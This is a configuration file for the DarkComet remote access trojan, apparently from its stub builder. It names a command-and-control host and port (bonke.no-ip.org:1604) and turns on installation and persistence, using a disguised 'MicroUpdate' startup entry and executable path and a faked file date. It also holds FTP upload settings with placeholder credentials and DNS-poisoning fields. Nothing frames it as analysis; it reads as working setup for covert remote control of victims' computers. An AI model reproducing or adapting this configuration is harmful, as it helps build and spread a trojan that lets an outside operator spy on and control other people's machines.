[EDITSERVER]
NAME=Main
WRITETYPE=RES
MUTEX=DC_MUTEX-KT2FTNQ
SID=HF
IPTEXT=bonke.no-ip.org
PORTTEXT=1604
TREEIP=bonke.no-ip.org:1604
INSTALL=YES
PERSINST=YES
COMBOPATH=7
EDTPATH=MSDCSC\msdcsc.exe
EDTKEYNAME=MicroUpdate
DATE=YES
EDTDATE=16/04/2007
COMBOFAKE=4
EDTMSGTITLE=Welcome
EDTMSG=Welcome to DarkComet RAT.
If you see this message, it means the stub successfully runs and you will apear 
in the master user list.

CHECKOFF=YES
EDTFTPHOST=ftp.yourhost.com
EDTFTPUSER=username
EDTFTPPASS=0123456789
EDTFTPPORT=21
EDTFTPROOT=/
SPSIZE=10
EDTPOISONIP=127.0.0.1
EDTPOISONDNS=localhost
RAD1=YES
COMBOEXT=0
CHECKPROFILESAVE=YES
PACK=NOPACK
